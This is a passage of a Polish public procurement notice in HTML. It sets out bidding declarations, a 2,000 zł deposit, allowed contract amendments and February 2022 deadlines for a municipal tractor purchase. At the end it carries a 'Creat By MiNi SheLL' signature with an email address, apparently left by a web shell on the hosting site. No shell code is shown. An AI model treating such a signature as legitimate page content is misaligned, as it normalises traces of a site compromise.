<h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawca załącza do oferty oświadczenie o niepodleganiu wykluczeniu i spełnianiu<br/>warunków udziału w postępowaniu. (załącznik nr 2 do SWZ). Oświadczenie stanowi dowód<br/>potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu na<br/>dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe<br/>środki dowodowe. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie te składa każdy z Wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia wraz z oświadczeniem, także oświadczenie podmiotu<br/>udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnianie<br/>warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego<br/>zasoby.<br/>2. Do oferty Wykonawca dołącza również: wypełniony i podpisany Załącznik nr 1A do SWZ -<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>Wymagania techniczne dla ciągnika rolniczego wraz ze sprzętem towarzyszącym, informacje o<br/>podwykonawcach (załącznik nr 3 do SWZ), kopię wyciągu ze świadectwa homologacji typu<br/>pojazdu lub świadectwa homologacji typu WE pojazdu, lub decyzji o dopuszczeniu<br/>jednostkowym pojazdu oferowanego ciągnika rolniczego (zgodnie z zapisami Rozdziału 2 pkt 9)<br/>oraz pełnomocnictwo, jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>Wykonawca zobowiązany jest wnieść wadium w wysokości: 2 000,00 zł (słownie: dwa tysięcy<br/>złotych). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia zgodnie z art. 58 ust. 2 ustawy Pzp, ustanawiają oni pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy, które zostaną wprowadzone do umowy, określone zostały<br/>w załączniku nr 7 do SWZ.<br/>1. Wszelkie zmiany umowy pod rygorem nieważności, wymagają formy pisemnej i mogą być<br/>dopuszczalne tylko w granicach unormowanych w art. 454 i art. 455 ustawy z dnia11 września<br/>2019 r. Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129, z<br/>późn. zm.).<br/>2. Zamawiający przewiduje następujące zmiany postanowień umowy:<br/>2.1. w przypadku obiektywnej niemożności zapewnienia wyposażenia przedmiotu umowy<br/>odpowiadającego wymogom zawartym w Załączniku nr 1A do SWZ z powodu zakończenia<br/>produkcji lub niedostępności na rynku elementów wyposażenia po zawarciu umowy –<br/>dopuszcza się zmianę umowy w zakresie rodzaju, typu lub modelu wyposażenia przedmiotu<br/>umowy, pod warunkiem, że nowe wyposażenie będzie odpowiadało pod względem<br/>funkcjonalności wyposażeniu pierwotnemu a jego parametry pozostaną niezmienione lub będą<br/>lepsze od pierwotnego;<br/>2.2. w przypadku zaproponowania przez Wykonawcę szczególnie uzasadnionej pod<br/>względem funkcjonalności, sprawności lub przeznaczenia albo wyposażenia<br/>przedmiotu umowy, zmiany rozwiązań konstrukcyjnych przedmiotu umowy w<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>stosunku do koncepcji przedstawionej w ofercie – dopuszcza się zmianę umowy w<br/>zakresie zawartych w Załączniku nr 1A do SWZ rozwiązań konstrukcyjnych;<br/>2.3. w przypadku zmian korzystnych dla Zamawiającego dopuszczalna jest zmiana umowy w<br/>zakresie obniżenia ceny lub zmiany wymogów zawartych Załączniku nr 1A do SWZ;<br/>2.4. w przypadku konieczności zapewnienia koordynacji dostarczenia przedmiotu umowy oraz<br/>innych umów zawartych przez Zamawiającego – dopuszczalna jest zmiana umowy w zakresie<br/>zmiany miejsca przeprowadzenia odbioru przedmiotu umowy, miejsca szkolenia przedstawicieli<br/>Zamawiającego;<br/>2.5. terminu realizacji przedmiotu zamówienia – gdy zaistnieją okoliczności mające wpływ na<br/>prawidłową realizację umowy (w szczególności, jeżeli zmiana terminu realizacji będzie zmianą<br/>korzystną dla Zamawiającego lub w przypadku zaistnienia siły wyższej itp.);<br/>2.6. ceny w przypadku zmiany stawek podatku VAT:<br/>a) jeżeli zmiana stawki VAT będzie powodować zwiększenie wartości umowy,<br/>Zamawiający dopuszcza możliwość zwiększenia ceny o kwotę równą kwocie podatku<br/>zapłaconego przez Wykonawcę przy jednoczesnym zachowaniu niezmienionej ceny netto;<br/>b) jeżeli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po<br/>stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia ceny o kwotę równą<br/>różnicy w kwocie podatku zapłaconego przez Wykonawcę przy jednoczesnym zachowaniu<br/>niezmienionej ceny netto.<br/>3. Zamawiający przewiduje możliwość zmiany postanowień niniejszej umowy także w<br/>przypadku, gdy:<br/>3.1. nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ<br/>na realizację przedmiotu zamówienia;<br/>3.2. konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach<br/>pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucja min nadzorującymi<br/>realizację projektu, w ramach, którego realizowane jest zamówienie;<br/>3.3. wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a<br/>zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu<br/>jednoznacznej interpretacji jej zapisów przez strony.<br/>4. Warunki zmian:<br/>4.1. inicjowanie zmian – na wniosek Wykonawcy lub Zamawiającego,<br/>4.2. uzasadnienie zmian – prawidłowa realizacja przedmiotu umowy, obniżenie kosztów,<br/>zapewnienie optymalnych parametrów technicznych i jakościowych dostaw,<br/>4.3. forma zmian – aneks do umowy w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Urząd Gminy Nurzec-Stacja ul. Żerczycka 33, 17-330 nurzec-Stacja, adres skrzynki podawczej EPUAP: /7r9e4c1bmr/SkrytkaESP, złożenie oferty odbyw sie za pomoca miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-08 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com